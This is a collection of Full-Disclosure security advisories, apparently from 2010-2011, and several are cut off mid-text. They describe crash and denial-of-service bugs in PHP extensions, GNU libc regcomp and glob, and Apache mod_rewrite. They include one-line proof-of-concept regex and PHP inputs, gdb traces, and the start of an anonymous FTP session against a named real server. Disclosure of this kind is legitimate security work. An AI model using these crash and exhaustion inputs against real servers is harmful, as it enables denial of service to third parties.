wrapper for ICU library, enabling PHP programmers to perform
UCA-conformant collation and date/time/number/currency formatting in
their scripts.
grapheme_extract ? Function to extract a sequence of default grapheme
clusters from a text buffer, which must be encoded in UTF-8.
- --- 1. PoC for grapheme_extract() ---
grapheme_extract('a',-1);
Change length of first parameter to change rip.
- --- 2. grapheme_extract() NULL Pointer Dereference ---
As we can see in grapheme_extract(str,size)
- -grapheme_extract()--
...
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "sl|llz", (char
**)&str, &str_len, &size, &extract_type, &lstart, &next) == FAILURE) {
<=== str='a' and size='-1'
...
/* if the string is all ASCII up to size+1 - or str_len whichever is
first - then we are done.
(size + 1 because the size-th character might be the beginning
of a
grapheme cluster)
*/
if ( -1 != grapheme_ascii_check(pstr, size + 1 < str_len ? size + 1 :
str_len ) ) { <=== ( size=-1+1=0 ) ===
long nsize = ( size < str_len ? size : str_len ); <=== nsize = -1
if ( NULL != next ) {
ZVAL_LONG(next, start+nsize);
}
RETURN_STRINGL(((char *)pstr), nsize, 1); <=== CRASH POINT
}
...
- -grapheme_extract()--
if we call to grapheme_ascii_check(pstr,0) where
- -grapheme_ascii_check()--
/* {{{ grapheme_ascii_check: ASCII check */
int grapheme_ascii_check(const unsigned char *day, int32_t len) < len=0
{
int ret_len = len;
while ( len-- ) {
if ( *day++ > 0x7f )
return -1;
}
return ret_len; <=== return 0
}
- -grapheme_ascii_check()--
then we get (int)0 in result and
long nsize = ( size < str_len ? size : str_len );
will be -1. Therefore,
RETURN_STRINGL(((char *)pstr), nsize, 1);
give NULL pointer dereference here.
Changing length of first parameter of grapheme_extract(), we will also
change rip in memcpy(3).
(gdb) r -r 'grapheme_extract('a',-1);'
...
(gdb) x/i $rip
=> 0x75511d99 : mov%rax,(%rdi)
(gdb) x/x $rax
0xf9891857a6e70f70: Cannot access memory at address 0xf9891857a6e70f70
(gdb) x/x $rdi
0x11b2000: Cannot access memory at address 0x11b2000
(gdb) r -r
'grapheme_extract('aaa',-1);'
...
(gdb) x/i $rip
=> 0x75511d77 : mov0x18(%rsi),%r10
(gdb) x/x $rsi
0x11b1fe8: 0x
- --- 3. Fix ---
CVS
http://svn.php.net/viewvc?view=revision&revision=306449
- --- 4. Greets ---
Pierre, Stas, sp3x, infospec
- --- 5. Contact ---
Author: Maksymilian Arciemowicz [ SecurityReason.com ]
Email:
- - cxib {a\./t]securityreason[d=t} com
GPG:
- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com/
http://cxib.net/
- --
Best Regards
pub 4096R/D6E5B530 2010-09-19
uid Maksymilian Arciemowicz (cx)
sub 4096R/58BA663C 2010-09-19
-BEGIN PGP SIGNATURE-
iQIcBAEBAgAGBQJNXFm7AAoJEIO8+dzW5bUwqowP/iP7Hx8HCvX5YrZk9b1UzU81
imYH1r7m5Xs0SkPpPeT0UwYH9MTYI04UeD2cskkBwdCTBRNPEQlRNhJIN7WzxjYv
WGH9vyE7VQD0x3oeSszFRHFdGGQ13qVmfBXJfDk8K1UiLsgabvdr6M69keRB7GqU
tX/2z97P+hWuEuCmjDcFmqeGwpjxPF+4omupq5BavY6KBQTxjfw3ECLb4gAxYDko
PC2uKXZ6iEuqHEeUElTpRnQFTCnToKIPRfogCkN9+m8hLcdrnEnGQc1sdxHXgVqk
nR+RCxA5ph5BO1d3ceQg8e2BpRT9vAIXyQI3UWD5N6O2Go7TO5T3NAdliBe3aVVf
7Awd3UCdeX50bDLzs55yACAqjinAzOoLVbEKVHBR/S6ogSsNp+4wkkDUhdj8G6s9
EUEY2qlNBJe5bTenzV5oXgpZ9lPuTSlbRjogdXtmhHBhv3nCIO2kLr0QZ293QsHZ
TGp/jmhuiu67dIIgtnObZOIckmcYZZukQeOOjThvTqia0dlrOi3QK9/deTISAESc
HHRMpgz52ptnUTg8G8p0uvpkwa/riW4WE9tXN9LVQxPUmboMcuTrCQ1WMCgQit9R
i8ALu1+4RJnErC/Q0CdBZcEFnnFxOOoTPSen6SSFRFnY1uwCklGtQPpJdcgXfpBN
9aCz02ztmFBMPO+/YTzb
=H8sm
-END PGP SIGNATURE-
0xD6E5B530.asc
Description: application/pgp-keys
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] GNU libc/regcomp(3) Multiple Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On 01/11/2011 04:33 PM, halfdog wrote: > > Nice find, but not the first one, look at: > > https://bugs.launchpad.net/ubuntu/+source/glibc/+bug/343894 > > I just reported the issue to ubuntu so see how their bug tracking team > was performing on an issue where a standard byte-array-fuzzer just > needed 2secs to find it. I wanted to know, if they could detect a > misclassified issue (was not reported as security bug) and bring it to a > fix. I would have bet, that they would be faster than you, but it seems > that you made the race. What I learned from the excercise (see bug > report date March 2009), is that the ubuntu launchpad platform is an > invaluable source of exploits when used together with google mining. I agree with you but in my opinion ubuntu tracking team has here nothing to do. Main problem exists in the GNU libc code so this team should fix the problem. Just compare the regcomp(3)/BSD and regcomp (3)/linux. In my opinion the GNU libc implementation is the worst in terms of safety. Probably vulnerability in glob(3) (CVE-2010-2632) can be used to resource exhasusion in GNU inetutils ftp server. - -- Best Regards pub 4096R/D6E5B530 2010-09-19 uid Maksymilian Arciemowicz (cx) sub 4096R/58BA663C 2010-09-19 -BEGIN PGP SIGNATURE- iQIcBAEBAgAGBQJNLKCKAAoJEIO8+dzW5bUw3JcP/jnau2AewihKbwSjQB5x3Civ fDL/LS2i+HRP+lMsmVsGqMpZN3kebdhm4M4/ZqTxQsVdAkBA9Ky5qL61nvz/BnVq IAU/JYd+5pt5NX4y3Qlcbwrcv1DgleZen4X7zP6hpQ2OuJd2iGvsTFqv7gq1g2pr CXhurbGP4v+ANZZJIq60D1LvKxjZ/lFAfkhJP5gTIF/l1QK0CmGTbWQdKxcxh4Rl ECT+k5LUNVA6dWSmnRzf+npKaIuEcxE5ckrkoRqccIyEYQJNLRImczSkmvATB5fi 1RaY7dFW135xrVZnYukJrq02lTGZHNfyQH6oVY8gzSATAJiM8ax59H37hV/6KNyN N5khIGHbgufoVF6n1R4LAbLlIVLzyJnlenMRS7HRFfYIJghYxwgNUhSop3q2ShRq qxfSaPsw0SihDP/bw5Y1XGsUIbk/sWbp4V1+TyROmO9sfW9+Ye7SC6yGV0kqghxc OkZSpWzT/Mj+MZZNc3FLj2qPspbC22tuapL0Bp6Ywe7KpSrVcf5NAc2BOxEsqYr9 2D21u4trRzUaNe/Aw7PGqZoWM9abvFKN74kLGJ1UOhgTNjziX4HZHMZf2c5laUDu LYYEfvUWASR/lT4xJiK/VvS320175rRPLq6MRpQNu7M+mwcLvKOfDeSVxLT9lsXx /biFVUcPpSviVnPNTn1W =xmsD -END PGP SIGNATURE- 0xD6E5B530.asc Description: application/pgp-keys ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] GNU libc/regcomp(3) Multiple Vulnerabilities
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[ GNU libc/regcomp(3) Multiple Vulnerabilities ]
Author: Maksymilian Arciemowicz
http://securityreason.com/
http://cxib.net/
Date:
- - Dis.: 01.10.2010
- - Pub.: 07.01.2011
CERT: VU#912279
CVE:
CVE-2010-4051
CVE-2010-4052
Affected (tested):
- - Ubuntu 10.10
- - Slackware 13
- - Gentoo 18.10.2010
- - FreeBSD 8.1 (grep(1))
- - NetBSD 5.0.2 (grep(1))
Original URL:
http://securityreason.com/achievement_securityalert/93
Exploit for proftpd:
http://cxib.net/stuff/proftpd.gnu.c
- --- 0.Description ---
The GNU C library is used as the C library in the GNU system and most
systems with the Linux kernel.
# define RE_DUP_MAX (0x7fff)
regcomp() is used to compile a regular expression into a form that is
suitable for subsequent regexec() searches.
- --- 1. RE_DUP_MAX overflow ---
The main problem exists in regcomp(3) function of GNU libc
implementation. Let`s try understand..
- ---
int
regcomp (preg, pattern, cflags)
regex_t *__restrict preg;
const char *__restrict pattern;
int cflags;
{
- ---
if we use '{', token type will be OP_OPEN_DUP_NUM.
- ---
/* This function parse repetition operators like "*", "+", "{1,3}" etc. */
static bin_tree_t *
parse_dup_op (bin_tree_t *elem, re_string_t *regexp, re_dfa_t *dfa,
re_token_t *token, reg_syntax_t syntax, reg_errcode_t *err)
{
bin_tree_t *tree = NULL, *old_tree = NULL;
int i, start, end, start_idx = re_string_cur_idx (regexp);
re_token_t start_token = *token;
if (token->type == OP_OPEN_DUP_NUM)
{
end = 0;
start = fetch_number (regexp, token, syntax); <= CONVERT VALUE
- ---
let`s see fetch_number =>
- ---
static int
fetch_number (re_string_t *input, re_token_t *token, reg_syntax_t syntax)
{
int num = -1;
unsigned char c;
while (1)
{
fetch_token (token, input, syntax);
c = token->opr.c;
if (BE (token->type == END_OF_RE, 0))
return -2;
if (token->type == OP_CLOSE_DUP_NUM || c == ',')
break;
num = ((token->type != CHARACTER || c < '0' || '9' < c || num == -2)
? -2 : ((num == -1) ? c - '0' : num * 10 + c - '0'));
num = (num > RE_DUP_MAX) ? -2 : num;
}
return num;
}
- ---
now see regex.h to know, what value have RE_DUP_MAX
- ---
/* Maximum number of duplicates an interval can allow. Some systems
(erroneously) define this in other header files, but we want our
value, so remove any previous define. */
# ifdef RE_DUP_MAX
# undef RE_DUP_MAX
# endif
/* If sizeof(int) == 2, then ((1 << 15) - 1) overflows. */
# define RE_DUP_MAX (0x7fff)
#endif
- ---
calc_eclosure_iter() will call to calc_eclosure_iter() match time. and
crash in malloc(3). Simple Recursion.
so we can't use value bigger 0x7fff in {n,}. regcomp(3) should return
ERROR if we use more that one time '{' token.
They are many vectors attack
grep(1):
c...@cx64:~$ ls |grep -E ".*{10,}{10,}{10,}{10,}{10,}"
Segmentation fault
pgrep(1):
c...@cx64:~$ pgrep ".*{10,}{10,}{10,}{10,}{10,}"
Segmentation fault
bregex from bacula-director-common
c...@cx64:~$ bregex -f glob-0day.c
Enter regex pattern: .*{10,}{10,}{10,}{10,}{10,}
Segmentation fault
whatis(1):
c...@cx64:~$ whatis -r ".*{10,}{10,}{10,}{10,}{10,}"
Segmentation fault
and more like proftpd.
Simple crash for CVE-2010-4051
(gdb) x/i $rip
=> 0x77ad3ea2: mov%eax,0x50(%rsp)
(gdb) x/i $eax
0x2: Cannot access memory at address 0x2
(gdb) x/i $rsp
0x7f5fef90: Cannot access memory at address 0x7f5fef90
(gdb) x/i 0x50($rsp)
Cannot access memory at address 0x7f5fef08
#0 0x77ad3ea2 in ?? () from /lib/libc.so.6
#1 0x77ad538e in malloc () from /lib/libc.so.6
#2 0x77b17d9b in ?? () from /lib/libc.so.6
#3 0x77b17f0b in ?? () from /lib/libc.so.6
#4 0x77b17f0b in ?? () from /lib/libc.so.6
#5 0x77b17f0b in ?? () from /lib/libc.so.6
#6 0x77b17f0b in ?? () from /lib/libc.so.6
#7 0x77b17f0b in ?? () from /lib/libc.so.6
...
- ---PoC1---
#include
int main(){
regex_t preg;
// char fmt[]=".*{10,}{10,}{10,}{10,}"; // CVE-2010-4052
char fmt[]=".*{10,}{10,}{10,}{10,}{10,}"; CVE-2010-4051
regcomp (&preg, fmt, REG_EXTENDED);
return 0;
}
- ---PoC1---
- --- 2. Stack Exhausion ---
This issue, may be also use to Denial of Service by stack exhausion
#ls |grep -E ".*{10,}{10,}{11,}"
- ---PoC2---
#include
int
main ()
{
regex_t preg;
char fmt[]=".*{10,}{10,}{10,}{10,}"; // CVE-2010-4052
// char fmt[]=".*{10,}{10,}{10,}{10,}{10,}"; // CVE-2010-4051
regcomp (&preg, fmt, REG_EXTENDED);
return 0;
}
- ---PoC2---
Such a pattern may lead to allocate a large memory area, or large
execution time
As we can read in vsftpd/HACKING
- ---
- do
[Full-disclosure] Apache Insecure mod_rewrite PCRE Resource Exhaustion
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [ Apache Insecure mod_rewrite PCRE Resource Exhaustion ] Author: Maksymilian Arciemowicz http://securityreason.com/ http://cxib.net/ Date: - - Dis.: 19.09.2010 - - Pub.: 21.12.2010 Affected (tested): - - NetBSD 5.0.2 (Apache 2.2.17 PHP 5.3.4) - - Ubuntu 10.10 (Apache 2.2.16 PHP 5.3.3) Original URL: http://securityreason.com/achievement_securityalert/92 - --- 0.Description --- The Apache HTTP Server, commonly referred to as Apache, is web server software notable for playing a key role in the initial growth of the World Wide Web. In 2009 it became the first web server software to surpass the 100 million web site milestone The PCRE(Perl Compatible Regular Expressions) library is a set of functions that implement regular expression pattern matching using the same syntax and semantics as Perl 5. PCRE has its own native API, as well as a set of wrapper functions that correspond to the POSIX regular expression API. The PCRE library is free, even for building proprietary software. - --- 1. Apache Insecure mod_rewrite PCRE Resource Exhaustion --- Using mod_rewrite and PCRE libs can be dangerous for stability apache server. Everybody know that using pcre regular expressions generate possible risk of DoS attack , and using multiple regular expressions in .htaccess is not good idea. I will show possibility DoS attack using .htaccess. Off course we can try configure our machine to be safe, anyway many servers are affected for this. Many versions of regular expressions, has no control over what executes. Example tags: let's see what will happen in firefox for this expression: .*.*.*(\w+)$1 Nothing special. Try this: .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*(\w+)$1 result in Firefox javascirpt: "Warning: Unresponsive script" Long execution in pcre generate "Unresponsive script". That same algorithm we can use in .htaccess $ httpd -v && php -v Server version: Apache/2.2.17 (Unix) Server built: Nov 11 2010 19:51:37 PHP 5.3.4 (cli) (built: Nov 11 2010 17:17:35) Copyright (c) 1997-2010 The PHP Group Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies $ pwd && ls -la /home/cx/public_html total 4 drwxrwxrwx 2 cx cx 512 Dec 19 01:10 . drwxr-xr-x 12 cx wheel 1024 Dec 19 01:10 .. $ vi poc.php $ ls -la . total 8 drwxrwxrwx 2 cx cx 512 Dec 19 01:16 . drwxr-xr-x 12 cx wheel 1024 Dec 19 01:10 .. - -rw-r--r-- 1 cx cx 2665 Dec 19 01:18 poc.php and remote request to poc.php c...@cx64:~$ curl http://172.16.124.128/~cx/poc.php on the server, any apache childs will stop in .htaccess (mod_rewrite => PCRE) # ps -aux -U www USER PID %CPU %MEM VSZ RSS TTY STAT STARTEDTIME COMMAND www 503 13.8 2.4 35620 27420 ? R 1:19AM 0:04.94 /usr/pkg/sbin/httpd -k start www 414 9.6 2.3 33572 25400 ? R 1:20AM 0:03.24 /usr/pkg/sbin/httpd -k start www 474 7.9 2.2 32548 24544 ? R 1:19AM 0:02.17 /usr/pkg/sbin/httpd -k start www 345 6.5 2.1 31524 23888 ? R 1:19AM 0:01.79 /usr/pkg/sbin/httpd -k start www 482 7.0 1.9 29476 21536 ? R 1:22AM 0:00.94 /usr/pkg/sbin/httpd -k start www 495 4.6 2.0 30500 22944 ? R 1:19AM 0:01.24 /usr/pkg/sbin/httpd -k start www 844 3.2 0.5 11980 5280 ? S 1:22AM 0:00.94 /usr/pkg/libexec/cgi-bin/php www 289 2.2 1.0 19236 10888 ? R 1:22AM 0:00.23 /usr/pkg/sbin/httpd -k start www 859 3.2 1.5 25380 17220 ? R 1:22AM 0:00.44 /usr/pkg/sbin/httpd -k start www 337 0.0 0.3 12068 3152 ? S 1:22AM 0:00.01 /usr/pkg/sbin/httpd -k start www 502 0.0 0.3 11988 3252 ? S 1:19AM 0:00.01 /usr/pkg/sbin/httpd -k start www 543 0.0 0.3 12068 3152 ? S 1:22AM 0:00.01 /usr/pkg/sbin/httpd -k start www 554 0.0 0.3 12068 3152 ? S 1:22AM 0:00.01 /usr/pkg/sbin/httpd -k start www 754 0.0 0.4 12068 3940 ? S 1:19AM 0:00.01 /usr/pkg/sbin/httpd -k start www 955 0.0 0.3 12068 3152 ? S 1:22AM 0:00.01 /usr/pkg/sbin/httpd -k start www 979 0.0 0.3 12068 3152 ? S 1:22AM 0:00.01 /usr/pkg/sbin/httpd -k start # ps -aux -U www USER PID %CPU %MEM VSZ RSS TTY STAT STARTEDTIME COMMAND www 389 4.0 1.9 29476 21360 ? R 1:22AM 0:00.80 /usr/pkg/sbin/httpd -k start www 455 4.3 1.8 28452 20080 ? R 1:22AM 0:00.55 /usr/pkg/sbin/httpd -k start www 712 4.9 1.8 27428 19688 ? R 1:22AM 0:00.51 /usr/pkg/sbin/httpd -k start www 516 3.8 2.1 31524 23632 ? R 1:22AM 0:02.05 /usr/pkg/sbin/httpd -k start ... www 1011 2.3 2.0 30500 21980 ? R 1:22AM 0:01.16 /usr/pkg/sbin/httpd -k start www 398 0.0 0.3 12068 3156 ? S 1:23AM 0:00.01 /usr/pkg/sbin/httpd -k start www 400 0.0 0.3 12068 3156 ? S 1:23AM 0:00.01 /usr/pkg/sbin/httpd -k start www 502 0.0 0.3 11988 3252 ? I 1:19AM 0:00.01 /usr/pkg/sbin/httpd -k start www 653 0.0 0.3 12068 3156 ? S 1:23AM 0:00.01 /usr/pkg/sbin/httpd -k start www 754 0.0 0.4 12068
[Full-disclosure] PHP 5.3.3 NumberFormatter::getSymbol Integer Overflow
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[ PHP 5.3.3 NumberFormatter::getSymbol Integer Overflow ]
Author: Maksymilian Arciemowicz
http://securityreason.com/
http://cxib.net/
Date:
- - Dis.: 11.11.2010
- - Pub.: 10.12.2010
CERT: VU#479900
CVE: CVE-2010-4409
CWE: CWE-189
Status: Fixed in PHP 5.3.4
Affected Software:
- - PHP 5.3.3
Original URL:
http://securityreason.com/achievement_securityalert/91
- --- 0.Description ---
Internationalization extension (further is referred as Intl) is a
wrapper for ICU library, enabling PHP programmers to perform
UCA-conformant collation and date/time/number/currency formatting in
their scripts.
Number Formatter: allows to display number according to the localized
format or given pattern or set of rules, and to parse strings into numbers.
- --- 1. PoC for Integer Overflow ---
$nx=new NumberFormatter("pl",1);
$nx->getSymbol(2147483648);
- --- 2. PHP 5.3.3/5.2.14 NumberFormatter::getSymbol Integer Overflow ---
As we can see in
- ---
PHP_FUNCTION( numfmt_get_symbol )
{
long symbol;
UChar value_buf[4];
UChar *value = value_buf;
int length = USIZE(value);
FORMATTER_METHOD_INIT_VARS;
/* Parse parameters. */
if( zend_parse_method_parameters( ZEND_NUM_ARGS() TSRMLS_CC, getThis(),
"Ol",
&object, NumberFormatter_ce_ptr, &symbol ) == FAILURE )
{
intl_error_set( NULL, U_ILLEGAL_ARGUMENT_ERROR,
"numfmt_get_symbol: unable to parse input params", 0
TSRMLS_CC );
RETURN_FALSE;
}
/* Fetch the object. */
FORMATTER_METHOD_FETCH_OBJECT;
length = unum_getSymbol(FORMATTER_OBJECT(nfo), symbol, value_buf,
length, &INTL_DATA_ERROR_CODE(nfo)); <= !!!TO BIG INT
HERE!!!
...
- ---
will crash for differ value. example {292804, 2147483648,
2147483649, 2554462209} (when rdi out off band (range 2to31 2to32 under
64bits linux)
Program received signal SIGSEGV, Segmentation fault.
0x7fffedf317f5 in icu_4_2::UnicodeString::extract(unsigned short*,
int, UErrorCode&) const () from /usr/lib/libicuuc.so.42
(gdb) bt
#0 0x7fffedf317f5 in icu_4_2::UnicodeString::extract(unsigned
short*, int, UErrorCode&) const () from /usr/lib/libicuuc.so.42
#1 0x7fffee5d11c0 in zif_numfmt_get_symbol (ht=17168120,
return_value=0x105c928, return_value_ptr=0x4, this_ptr=0x105f710,
return_value_used=17168144)
at /build/buildd/php5-5.3.3/ext/intl/formatter/formatter_attr.c:269
...blabla
rip0x7fffedf317f5 0x7fffedf317f5
eflags 0x10206 [ PF IF RF ]
let`s see value ~4294901761
$nx=new NumberFormatter("pl",1);
$nx->getSymbol(4294901761);
will crash in memcpy(3) ;]
Program received signal SIGSEGV, Segmentation fault.
memcpy () at ../sysdeps/x86_64/memcpy.S:90
90 ../sysdeps/x86_64/memcpy.S: No such file or directory.
in ../sysdeps/x86_64/memcpy.S
(gdb) bt
#0 memcpy () at ../sysdeps/x86_64/memcpy.S:90
#1 0x7fffea74a86a in icu_4_2::UnicodeString::extract(unsigned
short*, int, UErrorCode&) const () from /usr/lib/libicuuc.so.42
#2 0x7fffeadea2b4 in zif_numfmt_get_symbol (ht=17826952,
return_value=0x10fecd0, return_value_ptr=0xc, this_ptr=0x11004a0,
return_value_used=17826976)
at /build/buildd/php5-5.3.3/ext/intl/formatter/formatter_attr.c:274
#3 0x006e986a in zend_do_fcall_common_helper_SPEC (
execute_data=0x77eb8068)
at /build/buildd/php5-5.3.3/Zend/zend_vm_execute.h:316
...
let's see ICU UnicodeString::extract(unsigned short*, int, UErrorCode&)
- ---
int32_t
UnicodeString::extract(UChar *dest, int32_t destCapacity,
UErrorCode &errorCode) const {
int32_t len = length();
if(U_SUCCESS(errorCode)) {
if(isBogus() || destCapacity<0 || (destCapacity>0 && dest==0)) {
errorCode=U_ILLEGAL_ARGUMENT_ERROR;
} else {
const UChar *array = getArrayStart();
if(len>0 && len<=destCapacity && array!=dest) {
uprv_memcpy(dest, array, len*U_SIZEOF_UCHAR); <=== MEMCPY
REFERENCE HERE
}
return u_terminateUChars(dest, destCapacity, len, &errorCode);
}
}
return len;
}
- ---
so crash in rip=memcpy(3).
Method getLocal() also can generate simple crash (CWE-170)
$nx=new IntlDateFormatter("pl", IntlDateFormatter::FULL,
IntlDateFormatter::FULL);
$nx->getLocale(1);
- --- 3. Fix ---
Fix in next PHP Version 5.3.4:
http://www.kb.cert.org/vuls/id/479900
SVN:
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/intl/dateformat/dateformat_attr.c?view=log
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/intl/formatter/formatter_attr.c?view=log
- --- 4. Greets ---
Special thanks for Pierre Joye and Stas Malyshev for very quickly fix
Michael Orlando for security support
and sp3x, Infospec
- --- 5. Contact ---
Au
[Full-disclosure] PHP 5.3.3/5.2.14 ZipArchive::getArchiveComment NULL Pointer Deference
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[PHP 5.3.3/5.2.14 ZipArchive::getArchiveComment NULL Pointer Deference]
Author: Maksymilian Arciemowicz
http://securityreason.com/
http://cxib.net/
Date:
- - Dis.: 14.09.2010
- - Pub.: 05.11.2010
CVE: CVE-2010-3709
CWE: CWE-476
Status: Fixed in CVS
Affected Software:
- - PHP 5.3.3
- - PHP 5.2.14
Original URL:
http://securityreason.com/achievement_securityalert/90
- --- 0.Description ---
ZipArchive enables you to transparently read or write ZIP compressed
archives and the files inside them.
ZipArchive::getArchiveComment ? Returns the Zip archive comment
string ZipArchive::getArchiveComment ( void )
- --- 1. PHP 5.3.3/5.2.14 ZipArchive::getArchiveComment (CWE-476) ---
As we can see in
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/zip/php_zip.c?revision=303622&view=markup
- ---
1945static ZIPARCHIVE_METHOD(getArchiveComment)
1946{
1947struct zip *intern;
1948zval *this = getThis();
1949long flags = 0;
1950const char * comment;
1951int comment_len = 0;
1952
1953if (!this) {
1954RETURN_FALSE;
1955}
1956
1957ZIP_FROM_OBJECT(intern, this);
1958
1959if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "|l", &flags)
== FAILURE) {
1960return;
1961}
1962
1963comment = zip_get_archive_comment(intern, &comment_len,
(int)flags); < RETURN NULL AND -1
1964RETURN_STRINGL((char *)comment, (long)comment_len, 1); <= NULL
POINTER DEFERENCE HERE
1965}
- ---
this method return string from zip_get_archive_comment() function. Now
we need see this function,
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/zip/lib/zip_get_archive_comment.c?revision=284361&view=markup
- ---
40 ZIP_EXTERN(const char *)
41 zip_get_archive_comment(struct zip *za, int *lenp, int flags)
42 {
43 if ((flags & ZIP_FL_UNCHANGED)
44 || (za->ch_comment_len == -1)) {
45 if (za->cdir) {
46 if (lenp != NULL)
47 *lenp = za->cdir->comment_len;
48 return za->cdir->comment;
49 }
50 else {
51 if (lenp != NULL)
52 *lenp = -1; <= -1
53 return NULL; < NULL
54 }
55 }
56
57 if (lenp != NULL)
58 *lenp = za->ch_comment_len;
59 return za->ch_comment;
60 }
- ---
line 52 and 53 should return NULL pointer and (int)-1. In result
RETURN_STRINGL() will be executed with:
RETURN_STRINGL(NULL, -1, 1);
and crash in memcpy(3).
- --- 2. PoC ---
c...@cx64:/www$ touch empty.zip
c...@cx64:/www$ php -r '$zip= new
ZipArchive;$zip->open("./empty.zip");$zip->getArchiveComment();'
Segmentation fault
Debug:
c...@cx64:/www$ gdb -q php
Reading symbols from /usr/bin/php...(no debugging symbols found)...done.
(gdb) r -r '$zip= new
ZipArchive;$zip->open("./empty.zip");$zip->getArchiveComment();'
Starting program: /usr/bin/php -r '$zip= new
ZipArchive;$zip->open("./empty.zip");$zip->getArchiveComment();'
[Thread debugging using libthread_db enabled]
Program received signal SIGSEGV, Segmentation fault.
0x7530edbb in memcpy () from /lib/libc.so.6
(gdb) bt
#0 0x7530edbb in memcpy () from /lib/libc.so.6
#1 0x00679fa8 in _estrndup ()
#2 0x006371e5 in ?? ()
#3 0x006e793a in ?? ()
#4 0x006bec20 in execute ()
#5 0x0068b44a in zend_eval_stringl ()
#6 0x0068b5c9 in zend_eval_stringl_ex ()
#7 0x0072743e in ?? ()
#8 0x752a6c4d in __libc_start_main () from /lib/libc.so.6
#9 0x0042c6a9 in _start ()
(gdb) x/i $rip
=> 0x7530edbb : rep movsq %ds:(%rsi),%es:(%rdi)
(gdb) x/x $rsi
0x0:Cannot access memory at address 0x0
(gdb) x/x $rbp
0x: Cannot access memory at address 0x
- --- 3. Fix ---
Fix:
Replace
1963comment = zip_get_archive_comment(intern, &comment_len, (int)flags);
1964RETURN_STRINGL((char *)comment, (long)comment_len, 1);
to
1963comment = zip_get_archive_comment(intern, &comment_len, (int)flags);
1964if(comment==NULL) RETURN_FALSE;
1965RETURN_STRINGL((char *)comment, (long)comment_len, 1);
PHP 5.3:
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/zip/php_zip.c?view=log
PHP 5.2:
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/ext/zip/php_zip.c?view=log
MDVSA-2010:218
- --- 4. Greets ---
Special thanks for Pierre Joye
sp3x, Infospec, Adam Zabrocki 'pi3'
- --- 5. Contact ---
Author: SecurityReason.com [ Maksymilian Arciemowicz ]
Email:
- - cxib {a\./t] securityreason [d=t} com
GPG:
- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com/
http://cxib.net/
- --
Best Regards
pub 4096R/D6E5B530 2010-09-19
uid Maksymilian Arciemowicz (cx)
sub 4096R/58BA663C 2010-09-19
-BEGIN PGP SIGN
[Full-disclosure] Multiple Vendors libc/glob(3) resource exhaustion (+0day remote ftpd-anon)
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
[ Multiple Vendors libc/glob(3) resource exhaustion (+0day remote
ftpd-anon) ]
Author: Maksymilian Arciemowicz
http://netbsd.org/donations/
http://securityreason.com/
http://cxib.net/
Date:
- - Dis.: 06.11.2009
- - Pub.: 07.10.2010
CVE: CVE-2010-2632
Affected Software (verified):
- - OpenBSD 4.7
- - NetBSD 5.0.2
- - FreeBSD 7.3/8.1
- - Oracle Sun Solaris 10
- - GNU Libc (glibc)
Affected Ftp Servers:
- - ftp.openbsd.org (verified 02.07.2010: "connection refused" and ban)
- - ftp.netbsd.org (verified 02.07.2010: "connection limit of 160 reached"
and ban)
- - ftp.freebsd.org
- - ftp.adobe.com
- - ftp.hp.com
- - ftp.sun.com
- - more more and more
Affected Vendors (not verified):
- - Apple
- - Microsoft Interix
- - HP
- - more more more
Original URL:
http://securityreason.com/achievement_securityalert/89
- --- 0.Description ---
#include
int glob(const char *pattern, int flags,
int (*errfunc)(const char *epath, int eerrno), glob_t *pglob);
Description
This function expands a filename wildcard which is passed as pattern.
GLOB_LIMIT Limit the amount of memory used by matches to ARG_MAX.
This option should be set for programs that can be
coerced to a denial of service attack via patterns
that
expand to a very large number of matches, such as
a long
string of */../*/..
- --- 1. Multiple Vendors libc/glob(3) resource exhaustion ---
As we can read in definition GLOB_LIMIT:
- --
Limit the amount of memory used by matches to ARG_MAX. This option
should be set for programs that can be coerced to a denial of service
attack via patterns that expand to a very large number of mat
ches, such as a long string of */../*/..
- ---
but now is comming question "what will happen when we use */.. without
matching any results (simple searching)?" GLOB_LIMIT will be not
overflowed. To realize it, we need only use pattern with many
*/.. and many inodes in current directory. On the end of pattern, we
need add some not existed filename (like /cxib*).
If we don't have many files or directories in attacked direcotry, we
need create some dir-structure.
Let's see again:
http://cvsweb.netbsd.org/bsdweb.cgi/src/libexec/ftpd/ftpd.c?rev=1.61.2.5&content-type=text/x-cvsweb-markup
GLOB_LIMIT
protect us before attacks like
*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
because glob will find more patches as in GLOB_LIMIT declared. Anyway,
if we use path what do not exists (with */.. strings) like
*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*blablahaha
GLOB_LIMIT will be never overflowed. Many combinations of paths, will
execute this proces a long time. We can also try allocate
(GLOB_LIMIT-1)*MAXPATHNAMELEN bytes per one process. ~200~300MB
Example:
> telnet ftp.netbsd.org 21
Trying 204.152.190.15...
Connected to ftp.netbsd.org.
Escape character is '^]'.
220 ftp.NetBSD.org FTP server (NetBSD-ftpd 20100320) ready.
user anonymous
331 Guest login ok, type your name as password.
pass a...@cxib
230-
The NetBSD Project FTP Server located in Redwood City, CA, USA
...
230-
EXPORT NOTICE
...
230 Guest login ok, access restrictions apply.
stat
